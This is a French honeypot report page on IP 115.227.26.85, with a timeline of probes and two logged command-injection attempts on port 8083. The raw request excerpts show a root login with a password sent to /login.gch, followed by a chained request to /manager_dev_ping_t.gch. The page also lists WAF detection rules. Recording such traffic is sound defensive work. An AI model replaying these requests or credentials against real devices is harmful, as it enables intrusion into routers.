Détails IP 115.227.26.85

Pourquoi listée

Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.

Type « http-alt-8083 » (signaux protocolaires) · confiance 0%

Confiance 8 % — Score WAF 8 · Bonus corrélation +8

Comparaison ASN / FAI

ASN 58461 · 115.227.0.0/19 · APNIC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 6 événements sur la période pour cette IP.

125.124.128.77 Sonde SMB 19/06/2026 13:30 UTC
60.191.137.103 Sonde HTTP 19/06/2026 00:49 UTC
218.0.56.30 Sonde SSH 18/06/2026 22:47 UTC
183.134.89.220 Sonde SMB 16/06/2026 16:25 UTC
103.219.30.7 Sonde port 23/TCP 16/06/2026 14:19 UTC
115.239.213.219 Sonde SMB 16/06/2026 05:03 UTC
183.134.40.85 Cross-site scripting 15/06/2026 00:15 UTC
103.219.32.239 Sonde port 01/06/2026 01:12 UTC

IPs apparentées

Même FAI CT-HangZhou-IDC — corrélation indicative.

125.124.128.77 Sonde SMB
60.191.137.103 Sonde HTTP
218.0.56.30 Sonde SSH
183.134.89.220 Sonde SMB
103.219.30.7 Sonde port 23/TCP

Activité multi-protocole

Cette IP touche plusieurs services simulés (pas seulement le web).

HTTP TCP 3 HTTP ALT 8083 TCP 3

HTTP

3

HTTP ALT 8083

3

Filtres

Les dates De/À priment sur la période. Affinez protocole, port, service et classification.

proto=Tous service=Tous port=Tous type=Tous sév.=Toutes

Période

De

À

Protocole

Port (dst)

Service

Classification

Sévérité min

Sévérité max

Réinitialiser

Chronologie des événements

6 événement(s) — page 1/1

Horodatage	Proto	Port	Service	Classification	Sévérité	Risque
18/06/2026 14:42:46 UTC	TCP	8083 · HTTP	http	Injection de commande cmd injection · via HTTP:8083 · (tentative d'exploit) · → /login.gch	Élevée	Élevé · 82
Étape Tentative d'exploit Chaîne Exploitation Persona mail.sensor-1.internal Rôle capteur Renseignement menaces MITRE T1059 TA0001 TA0002 Protocole POST /login.gch UA r00ts3c-owned-you Émulateur HTTP WAF 26 Recommandation Investiguer Tags 950327:rce-0 950331:rce-1 950407:ssrf-3 950471:nosqli-3 Cible HTTP POST /login.gch TLS SNI — Capteur paris-1
Preuve / Evidence Méthode POST Port 8083 Chemin / cible /login.gch Service HTTP Pourquoi cette classification : Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100% Confiance classification 100% Risque capteur Élevé · 82 Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé Protocole émulé 1 Signaux Http Cmdi pat-0145 pat-0146 Technique MITRE T1059 Tactiques MITRE TA0001 TA0002 Motifs de détection (base) CRS 921130 duplicate CL CRS 932200 CRS 932205 TeamSpeak3 Ligne de requête `POST /login.gch HTTP/1.1` User-Agent r00ts3c-owned-you Règles WAF rce-0 rce-1 ssrf-3 nosqli-3 Payload (extrait) POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: / Frm_Loginto Requête brute (extrait) POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: / Frm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST /manager_dev_ping_t.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: Meta JSON brut { "protocol_emulated": true, "emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b", "emulator_response_len": 82, "http_header_count": 4, "http_query_params": 0, "http_path_depth": 1, "http_path_ext": "gch", "http_ua_hash": "cf457b39ca1ed09a62427df715058d10b039c109", "http_host_hash": null, "http_target_hash": "297c504799609cfe753e35db128a9be162f28f7d", "http_referer_hash": null, "http_method": "POST", "http_ua_is_cli": false, "http_ua_is_browser": false, "bytes_in": 659, "payload_entropy": 5.466302572005077, "port_category": "registered", "org": "CT-HangZhou-IDC", "service": "http", "app_proto": "http", "asn": 58461, "country": "CN", "dst_port": 8083, "risk_waf": 100, "risk_classification": 85, "risk_behavior": 0, "risk_geo": 0, "risk_protocol": 43, "risk_novelty": 25, "risk_boost": 15, "risk_granularity": 6.7, "risk_breakdown": { "waf": 100, "classification": 85, "behavior": 0, "geo": 0, "protocol": 43, "novelty": 25 }, "risk_score": 82, "tag_count": 11, "anomaly_count": 0, "campaign_key": "567ee99ead398d5e8dff08296735fd3324b36997", "event_fingerprint": "a858fca3b3a8ef48dad20a1cb938d02f0de6e320", "classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%", "confidence": 1, "classification_confidence": 1, "precision_score": 212, "precision_signals": [ "INT-http_cmdi", "pat-0145", "pat-0146" ], "kb_rule_ids": [ "INT-http_cmdi", "pat-0145", "pat-0146" ], "matched_patterns": [ "pat-0842", "pat-0145", "pat-0146", "pat-0772" ], "matched_pattern_names": [ "CRS 921130 duplicate CL", "CRS 932200", "CRS 932205", "TeamSpeak3" ], "pattern_ids": [ "pat-0842", "pat-0145", "pat-0146", "pat-0772" ], "confidence_breakdown": { "waf": 100, "classification": 85, "behavior": 0, "geo": 0, "protocol": 43, "novelty": 25, "risk_score": 82 }, "named_classification_skipped": false, "service_name": "http", "risk_confidence_factor": 100, "city": null, "is_datacenter": false, "is_tor_hint": false, "geo": { "country": "CN", "asn": 58461, "org": "CT-HangZhou-IDC", "is_datacenter": false, "is_tor_hint": false }, "fingerprint": { "http_ua_hash": "cf908e3be2b0e84af769ea28409d6afb", "payload_hash": "a6d724e184027cf38cffffe097052d1c", "path_pattern_hash": "566116aa56cf0726ba77deefe998a873" }, "target_context": { "dst_port": 8083, "service": "http", "service_name": "http", "risk_score": 82 }, "payload_preview": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "method": "POST", "path": "\/login.gch", "user_agent": "r00ts3c-owned-you", "waf_tags": [ "950327:rce-0", "950331:rce-1", "950407:ssrf-3", "950471:nosqli-3" ], "waf_rule_names": [ "rce-0", "rce-1", "ssrf-3", "nosqli-3" ], "request_line": "POST \/login.gch HTTP\/1.1", "request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ", "payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "evidence": { "method": "POST", "path": "\/login.gch", "user_agent": "r00ts3c-owned-you", "waf_tags": [ "950327:rce-0", "950331:rce-1", "950407:ssrf-3", "950471:nosqli-3" ], "waf_rule_names": [ "rce-0", "rce-1", "ssrf-3", "nosqli-3" ], "request_line": "POST \/login.gch HTTP\/1.1", "request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ", "payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%" }, "attack_stage": "exploit_attempt", "mitre_tactics": [ "TA0001", "TA0002" ], "mitre_techniques": [ "T1059", "T1190" ], "mitre": "T1059", "threat_family": [ "rce_probe", "ssrf_probe" ], "recommended_client_action": "investigate", "policy_mode": "intelligence", "sensor_role": "threat_intelligence", "event_signature": "ed610c2b5afb0b6a17e9237e4e29c602d177650a", "protocol_details": { "http_method": "POST", "http_path": "\/login.gch", "request_line": "POST \/login.gch HTTP\/1.1", "http_user_agent": "r00ts3c-owned-you", "port": 8083, "service": "http", "service_label_fr": "HTTP" }, "evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "attack_vector": "cmd injection \u00b7 via HTTP:8083 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/login.gch", "target_port_label": "8083 \u00b7 HTTP", "emulator_service": "http", "confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9", "site_display": { "classification": null, "classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%", "classification_reason_label_fr": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%", "executive_one_liner_fr": "Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP", "confidence_pct": 100, "confidence_breakdown": { "waf": 100, "classification": 85, "behavior": 0, "geo": 0, "protocol": 43, "novelty": 25, "risk_score": 82 }, "attack_stage": "exploit_attempt", "attack_stage_label": "Tentative d'exploit", "attack_chain_stage": "exploitation", "attack_chain_stage_label_fr": "Exploitation", "risk_score": 82, "risk_label": "\u00c9lev\u00e9", "service_name": "http", "service_label_fr": "HTTP", "dst_port": 8083, "protocol_emulated": true, "tags_summary": [ "INT-http_cmdi", "pat-0145", "pat-0146" ], "tags_summary_labels_fr": [ "Http Cmdi", "pat-0145", "pat-0146" ], "recommended_action": "investigate", "recommended_action_label": "Investiguer", "mitre": "T1059", "mitre_technique": "T1059", "persona_hostname": "mail.sensor-1.internal", "persona_service_banner": "honeypot-http", "correlation_flags": null, "correlation_flags_labels_fr": null, "sensor_role": "threat_intelligence", "sensor_role_label_fr": "Renseignement menaces", "confidence_hint_fr": null, "protocol_details": { "http_method": "POST", "http_path": "\/login.gch", "request_line": "POST \/login.gch HTTP\/1.1", "http_user_agent": "r00ts3c-owned-you", "port": 8083, "service": "http", "service_label_fr": "HTTP" }, "attack_vector": "cmd injection \u00b7 via HTTP:8083 \u00b7 (tentative d'exploit) \u00b7 \u2192 \/login.gch", "evidence_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "target_port_label": "8083 \u00b7 HTTP", "emulator_service": "http", "confidence_reason": "Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9", "confidence_factors_fr": "Confiance 100 % \u2014 Score WAF 100 \u00b7 4 tag(s) WAF", "campaign_hint_fr": null, "attack_phases_timeline_fr": [ { "key": "recon", "label_fr": "Reconnaissance", "active": false, "kind": "stage" }, { "key": "probe", "label_fr": "Sonde \/ probe", "active": false, "kind": "stage" }, { "key": "exploit_attempt", "label_fr": "Tentative d'exploit", "active": true, "kind": "stage" }, { "key": "post_exploit", "label_fr": "Post-exploitation", "active": false, "kind": "stage" }, { "key": "c2", "label_fr": "Commande & contr\u00f4le", "active": false, "kind": "stage" }, { "key": "exploitation", "label_fr": "Exploitation", "active": true, "kind": "chain", "hint_fr": null } ] }, "honeypot_persona": { "sensor_id": "sensor-1", "hostname": "mail.sensor-1.internal", "mail_host": "mail.sensor-1.internal", "ldap_dc": "dc.sensor-1.internal", "k8s_cluster": "hp-sensor-1", "domain": "sensor-1.internal", "service_role": "http", "service_banner": "honeypot-http", "service_os": "linux", "dst_port": "8083" }, "hostname": "mail.sensor-1.internal", "sensor_id": "sensor-1", "attack_chain_stage": "exploitation", "ban_policy": "advisory_investigate", "tags_list": [ "950327:rce-0", "950331:rce-1", "950407:ssrf-3", "950471:nosqli-3", "http_cmd_injection", "http_credential_body", "http_idor_probe", "http_jwt_body", "http_missing_host", "http_ssrf_body", "net_web_probe" ] }
18/06/2026 14:42:46 UTC	TCP	8083 · HTTP ALT 8083	http-alt-8083	http-alt-8083 http-alt-8083 · via HTTP ALT 8083:8083 · (sonde / probe)	Faible	Faible · 0
Étape Sonde / probe Chaîne Découverte Persona mail.sensor-1.internal Rôle capteur Renseignement menaces Corrélations Multi-protocole corrélé (5 min) MITRE TA0007 TA0007 TA0001 Protocole Émulateur HTTP-ALT-8083 WAF — Recommandation Surveiller Tags — Cible HTTP — TLS SNI — Capteur paris-1
Preuve / Evidence Méthode — Port 8083 Chemin / cible — Service HTTP ALT 8083 Pourquoi cette classification : Type « http-alt-8083 » (signaux protocolaires) · confiance 0% Confiance classification 8% Corrélation +8 Risque capteur Faible · 0 Confiance : Confiance faible (0 %) — classification prudente Protocole émulé 1 Technique MITRE TA0007 Tactiques MITRE TA0007 TA0001 User-Agent — Règles WAF — Meta JSON brut { "protocol_emulated": true, "emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b", "emulator_response_len": 82, "port_inferred_service": true, "bytes_in": 0, "payload_entropy": 0, "port_category": "registered", "org": "CT-HangZhou-IDC", "service": "http-alt-8083", "app_proto": "http-alt-8083", "asn": 58461, "country": "CN", "dst_port": 8083, "risk_waf": 8, "risk_classification": 0, "risk_behavior": 0, "risk_geo": 0, "risk_protocol": 22, "risk_novelty": 0, "risk_boost": 0, "risk_granularity": 3.7, "risk_breakdown": { "waf": 8, "classification": 0, "behavior": 0, "geo": 0, "protocol": 22, "novelty": 0 }, "risk_score": 0, "tag_count": 0, "anomaly_count": 0, "campaign_key": "4d8aadabcd1c859671a9c5ddc55350e79e517b17", "event_fingerprint": "aafb7ac8941c9e078930e4799c90ed51eac5bf8d", "classification_reason": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%", "confidence": 0.08, "classification_confidence": 0.08, "precision_score": 0, "precision_signals": [], "kb_rule_ids": [], "confidence_breakdown": { "waf": 8, "classification": 0, "behavior": 0, "geo": 0, "protocol": 22, "novelty": 0, "risk_score": 0, "correlation_boost": 8 }, "named_classification_skipped": false, "service_name": "http-alt-8083", "risk_confidence_factor": 0, "city": null, "is_datacenter": false, "is_tor_hint": false, "geo": { "country": "CN", "asn": 58461, "org": "CT-HangZhou-IDC", "is_datacenter": false, "is_tor_hint": false }, "fingerprint": { "path_pattern_hash": "54f123e610d8386f898485b621afba15" }, "target_context": { "dst_port": 8083, "service": "http-alt-8083", "service_name": "http-alt-8083", "risk_score": 0 }, "attack_stage": "probe", "mitre_tactics": [ "TA0007", "TA0001" ], "mitre": "TA0007", "threat_family": [ "unknown" ], "recommended_client_action": "monitor", "policy_mode": "intelligence", "sensor_role": "threat_intelligence", "event_signature": "6163c2957bda6c59889ded9bedae57bac6349b51", "protocol_details": { "port": 8083, "service": "http-alt-8083", "service_label_fr": "HTTP ALT 8083" }, "attack_vector": "http-alt-8083 \u00b7 via HTTP ALT 8083:8083 \u00b7 (sonde \/ probe)", "target_port_label": "8083 \u00b7 HTTP ALT 8083", "emulator_service": "http-alt-8083", "confidence_reason": "Confiance faible (0 %) \u2014 classification prudente", "site_display": { "classification": null, "classification_reason": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%", "classification_reason_label_fr": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%", "executive_one_liner_fr": "Activit\u00e9 suspecte", "confidence_pct": 8, "confidence_breakdown": { "waf": 8, "classification": 0, "behavior": 0, "geo": 0, "protocol": 22, "novelty": 0, "risk_score": 0, "correlation_boost": 8 }, "attack_stage": "probe", "attack_stage_label": "Sonde \/ probe", "attack_chain_stage": "discovery", "attack_chain_stage_label_fr": "D\u00e9couverte", "risk_score": 0, "risk_label": "Faible", "service_name": "http-alt-8083", "service_label_fr": "HTTP ALT 8083", "dst_port": 8083, "protocol_emulated": true, "tags_summary": null, "tags_summary_labels_fr": null, "recommended_action": "monitor", "recommended_action_label": "Surveiller", "mitre": "TA0007", "mitre_technique": "TA0007", "persona_hostname": "mail.sensor-1.internal", "persona_service_banner": "honeypot-http-alt-8083", "correlation_flags": [ "multi_protocol_correlation" ], "correlation_flags_labels_fr": [ "Multi-protocole corr\u00e9l\u00e9 (5 min)" ], "sensor_role": "threat_intelligence", "sensor_role_label_fr": "Renseignement menaces", "confidence_hint_fr": "Corr\u00e9lation +8", "protocol_details": { "port": 8083, "service": "http-alt-8083", "service_label_fr": "HTTP ALT 8083" }, "attack_vector": "http-alt-8083 \u00b7 via HTTP ALT 8083:8083 \u00b7 (sonde \/ probe)", "evidence_snippet": null, "target_port_label": "8083 \u00b7 HTTP ALT 8083", "emulator_service": "http-alt-8083", "confidence_reason": "Confiance faible (0 %) \u2014 classification prudente", "confidence_factors_fr": "Confiance 8 % \u2014 Score WAF 8 \u00b7 Bonus corr\u00e9lation +8", "campaign_hint_fr": null, "attack_phases_timeline_fr": [ { "key": "recon", "label_fr": "Reconnaissance", "active": false, "kind": "stage" }, { "key": "probe", "label_fr": "Sonde \/ probe", "active": true, "kind": "stage" }, { "key": "exploit_attempt", "label_fr": "Tentative d'exploit", "active": false, "kind": "stage" }, { "key": "post_exploit", "label_fr": "Post-exploitation", "active": false, "kind": "stage" }, { "key": "c2", "label_fr": "Commande & contr\u00f4le", "active": false, "kind": "stage" }, { "key": "discovery", "label_fr": "D\u00e9couverte", "active": true, "kind": "chain", "hint_fr": null } ] }, "honeypot_persona": { "sensor_id": "sensor-1", "hostname": "mail.sensor-1.internal", "mail_host": "mail.sensor-1.internal", "ldap_dc": "dc.sensor-1.internal", "k8s_cluster": "hp-sensor-1", "domain": "sensor-1.internal", "service_role": "http_alt_8083", "service_banner": "honeypot-http-alt-8083", "service_os": "linux", "dst_port": "8083" }, "hostname": "mail.sensor-1.internal", "sensor_id": "sensor-1", "multi_protocol_correlation": true, "multi_protocol_count": 2, "multi_protocol_sample": [ "http", "http-alt-8083" ], "multi_protocol_window_s": 300, "behavior_alerts": [ "multi_protocol_correlation" ], "correlation_confidence_boost": 8, "attack_chain_stage": "discovery", "matched_patterns": [], "ban_policy": "advisory_monitor" }
18/06/2026 13:30:23 UTC	TCP	8083 · HTTP ALT 8083	http-alt-8083	http-alt-8083 http-alt-8083 · via HTTP ALT 8083:8083 · (sonde / probe)	Faible	Faible · 0
Étape Sonde / probe Chaîne Découverte Persona mail.sensor-1.internal Rôle capteur Renseignement menaces Corrélations Multi-protocole corrélé (5 min) MITRE TA0007 TA0007 TA0001 Protocole Émulateur HTTP-ALT-8083 WAF — Recommandation Surveiller Tags — Cible HTTP — TLS SNI — Capteur paris-1
Preuve / Evidence Méthode — Port 8083 Chemin / cible — Service HTTP ALT 8083 Pourquoi cette classification : Type « http-alt-8083 » (signaux protocolaires) · confiance 0% Confiance classification 8% Corrélation +8 Risque capteur Faible · 0 Confiance : Confiance faible (0 %) — classification prudente Protocole émulé 1 Technique MITRE TA0007 Tactiques MITRE TA0007 TA0001 User-Agent — Règles WAF — Meta JSON brut { "protocol_emulated": true, "emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b", "emulator_response_len": 82, "port_inferred_service": true, "bytes_in": 0, "payload_entropy": 0, "port_category": "registered", "org": "CT-HangZhou-IDC", "service": "http-alt-8083", "app_proto": "http-alt-8083", "asn": 58461, "country": "CN", "dst_port": 8083, "risk_waf": 8, "risk_classification": 0, "risk_behavior": 0, "risk_geo": 0, "risk_protocol": 22, "risk_novelty": 0, "risk_boost": 0, "risk_granularity": 3.7, "risk_breakdown": { "waf": 8, "classification": 0, "behavior": 0, "geo": 0, "protocol": 22, "novelty": 0 }, "risk_score": 0, "tag_count": 0, "anomaly_count": 0, "campaign_key": "4d8aadabcd1c859671a9c5ddc55350e79e517b17", "event_fingerprint": "aafb7ac8941c9e078930e4799c90ed51eac5bf8d", "classification_reason": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%", "confidence": 0.08, "classification_confidence": 0.08, "precision_score": 0, "precision_signals": [], "kb_rule_ids": [], "confidence_breakdown": { "waf": 8, "classification": 0, "behavior": 0, "geo": 0, "protocol": 22, "novelty": 0, "risk_score": 0, "correlation_boost": 8 }, "named_classification_skipped": false, "service_name": "http-alt-8083", "risk_confidence_factor": 0, "city": null, "is_datacenter": false, "is_tor_hint": false, "geo": { "country": "CN", "asn": 58461, "org": "CT-HangZhou-IDC", "is_datacenter": false, "is_tor_hint": false }, "fingerprint": { "path_pattern_hash": "54f123e610d8386f898485b621afba15" }, "target_context": { "dst_port": 8083, "service": "http-alt-8083", "service_name": "http-alt-8083", "risk_score": 0 }, "attack_stage": "probe", "mitre_tactics": [ "TA0007", "TA0001" ], "mitre": "TA0007", "threat_family": [ "unknown" ], "recommended_client_action": "monitor", "policy_mode": "intelligence", "sensor_role": "threat_intelligence", "event_signature": "6163c2957bda6c59889ded9bedae57bac6349b51", "protocol_details": { "port": 8083, "service": "http-alt-8083", "service_label_fr": "HTTP ALT 8083" }, "attack_vector": "http-alt-8083 \u00b7 via HTTP ALT 8083:8083 \u00b7 (sonde \/ probe)", "target_port_label": "8083 \u00b7 HTTP ALT 8083", "emulator_service": "http-alt-8083", "confidence_reason": "Confiance faible (0 %) \u2014 classification prudente", "site_display": { "classification": null, "classification_reason": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%", "classification_reason_label_fr": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%", "executive_one_liner_fr": "Activit\u00e9 suspecte", "confidence_pct": 8, "confidence_breakdown": { "waf": 8, "classification": 0, "behavior": 0, "geo": 0, "protocol": 22, "novelty": 0, "risk_score": 0, "correlation_boost": 8 }, "attack_stage": "probe", "attack_stage_label": "Sonde \/ probe", "attack_chain_stage": "discovery", "attack_chain_stage_label_fr": "D\u00e9couverte", "risk_score": 0, "risk_label": "Faible", "service_name": "http-alt-8083", "service_label_fr": "HTTP ALT 8083", "dst_port": 8083, "protocol_emulated": true, "tags_summary": null, "tags_summary_labels_fr": null, "recommended_action": "monitor", "recommended_action_label": "Surveiller", "mitre": "TA0007", "mitre_technique": "TA0007", "persona_hostname": "mail.sensor-1.internal", "persona_service_banner": "honeypot-http-alt-8083", "correlation_flags": [ "multi_protocol_correlation" ], "correlation_flags_labels_fr": [ "Multi-protocole corr\u00e9l\u00e9 (5 min)" ], "sensor_role": "threat_intelligence", "sensor_role_label_fr": "Renseignement menaces", "confidence_hint_fr": "Corr\u00e9lation +8", "protocol_details": { "port": 8083, "service": "http-alt-8083", "service_label_fr": "HTTP ALT 8083" }, "attack_vector": "http-alt-8083 \u00b7 via HTTP ALT 8083:8083 \u00b7 (sonde \/ probe)", "evidence_snippet": null, "target_port_label": "8083 \u00b7 HTTP ALT 8083", "emulator_service": "http-alt-8083", "confidence_reason": "Confiance faible (0 %) \u2014 classification prudente", "confidence_factors_fr": "Confiance 8 % \u2014 Score WAF 8 \u00b7 Bonus corr\u00e9lation +8", "campaign_hint_fr": null, "attack_phases_timeline_fr": [ { "key": "recon", "label_fr": "Reconnaissance", "active": false, "kind": "stage" }, { "key": "probe", "label_fr": "Sonde \/ probe", "active": true, "kind": "stage" }, { "key": "exploit_attempt", "label_fr": "Tentative d'exploit", "active": false, "kind": "stage" }, { "key": "post_exploit", "label_fr": "Post-exploitation", "active": false, "kind": "stage" }, { "key": "c2", "label_fr": "Commande & contr\u00f4le", "active": false, "kind": "stage" }, { "key": "discovery", "label_fr": "D\u00e9couverte", "active": true, "kind": "chain", "hint_fr": null } ] }, "honeypot_persona": { "sensor_id": "sensor-1", "hostname": "mail.sensor-1.internal", "mail_host": "mail.sensor-1.internal", "ldap_dc": "dc.sensor-1.internal", "k8s_cluster": "hp-sensor-1", "domain": "sensor-1.internal", "service_role": "http_alt_8083", "service_banner": "honeypot-http-alt-8083", "service_os": "linux", "dst_port": "8083" }, "hostname": "mail.sensor-1.internal", "sensor_id": "sensor-1", "multi_protocol_correlation": true, "multi_protocol_count": 2, "multi_protocol_sample": [ "http", "http-alt-8083" ], "multi_protocol_window_s": 300, "behavior_alerts": [ "multi_protocol_correlation" ], "correlation_confidence_boost": 8, "attack_chain_stage": "discovery", "matched_patterns": [], "ban_policy": "advisory_monitor" }
18/06/2026 13:30:22 UTC	TCP	8083 · HTTP	http	Injection de commande cmd injection · via HTTP:8083 · (tentative d'exploit) · → /login.gch	Élevée	Élevé · 82
Étape Tentative d'exploit Chaîne Exploitation Persona mail.sensor-1.internal Rôle capteur Renseignement menaces MITRE T1059 TA0001 TA0002 Protocole POST /login.gch UA r00ts3c-owned-you Émulateur HTTP WAF 26 Recommandation Investiguer Tags 950327:rce-0 950331:rce-1 950407:ssrf-3 950471:nosqli-3 Cible HTTP POST /login.gch TLS SNI — Capteur paris-1
Preuve / Evidence Méthode POST Port 8083 Chemin / cible /login.gch Service HTTP Pourquoi cette classification : Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100% Confiance classification 100% Risque capteur Élevé · 82 Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé Protocole émulé 1 Signaux Http Cmdi pat-0145 pat-0146 Technique MITRE T1059 Tactiques MITRE TA0001 TA0002 Motifs de détection (base) CRS 921130 duplicate CL CRS 932200 CRS 932205 TeamSpeak3 Ligne de requête `POST /login.gch HTTP/1.1` User-Agent r00ts3c-owned-you Règles WAF rce-0 rce-1 ssrf-3 nosqli-3 Payload (extrait) POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: / Frm_Loginto Requête brute (extrait) POST /login.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: 420 Connection: keep-alive Accept: / Frm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST /manager_dev_ping_t.gch HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Length: Meta JSON brut { "protocol_emulated": true, "emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b", "emulator_response_len": 82, "http_header_count": 4, "http_query_params": 0, "http_path_depth": 1, "http_path_ext": "gch", "http_ua_hash": "cf457b39ca1ed09a62427df715058d10b039c109", "http_host_hash": null, "http_target_hash": "297c504799609cfe753e35db128a9be162f28f7d", "http_referer_hash": null, "http_method": "POST", "http_ua_is_cli": false, "http_ua_is_browser": false, "bytes_in": 659, "payload_entropy": 5.466302572005077, "port_category": "registered", "org": "CT-HangZhou-IDC", "service": "http", "app_proto": "http", "asn": 58461, "country": "CN", "dst_port": 8083, "risk_waf": 100, "risk_classification": 85, "risk_behavior": 0, "risk_geo": 0, "risk_protocol": 43, "risk_novelty": 25, "risk_boost": 15, "risk_granularity": 6.7, "risk_breakdown": { "waf": 100, "classification": 85, "behavior": 0, "geo": 0, "protocol": 43, "novelty": 25 }, "risk_score": 82, "tag_count": 11, "anomaly_count": 0, "campaign_key": "567ee99ead398d5e8dff08296735fd3324b36997", "event_fingerprint": "a858fca3b3a8ef48dad20a1cb938d02f0de6e320", "classification_reason": "Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%", "confidence": 1, "classification_confidence": 1, "precision_score": 212, "precision_signals": [ "INT-http_cmdi", "pat-0145", "pat-0146" ], "kb_rule_ids": [ "INT-http_cmdi", "pat-0145", "pat-0146" ], "matched_patterns": [ "pat-0842", "pat-0145", "pat-0146", "pat-0772" ], "matched_pattern_names": [ "CRS 921130 duplicate CL", "CRS 932200", "CRS 932205", "TeamSpeak3" ], "pattern_ids": [ "pat-0842", "pat-0145", "pat-0146", "pat-0772" ], "confidence_breakdown": { "waf": 100, "classification": 85, "behavior": 0, "geo": 0, "protocol": 43, "novelty": 25, "risk_score": 82 }, "named_classification_skipped": false, "service_name": "http", "risk_confidence_factor": 100, "city": null, "is_datacenter": false, "is_tor_hint": false, "geo": { "country": "CN", "asn": 58461, "org": "CT-HangZhou-IDC", "is_datacenter": false, "is_tor_hint": false }, "fingerprint": { "http_ua_hash": "cf908e3be2b0e84af769ea28409d6afb", "payload_hash": "a6d724e184027cf38cffffe097052d1c", "path_pattern_hash": "566116aa56cf0726ba77deefe998a873" }, "target_context": { "dst_port": 8083, "service": "http", "service_name": "http", "risk_score": 82 }, "payload_preview": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Loginto", "method": "POST", "path": "\/login.gch", "user_agent": "r00ts3c-owned-you", "waf_tags": [ "950327:rce-0", "950331:rce-1", "950407:ssrf-3", "950471:nosqli-3" ], "waf_rule_names": [ "rce-0", "rce-1", "ssrf-3", "nosqli-3" ], "request_line": "POST \/login.gch HTTP\/1.1", "request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: \/\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ", "payload_snippet": "POST \/login.gch 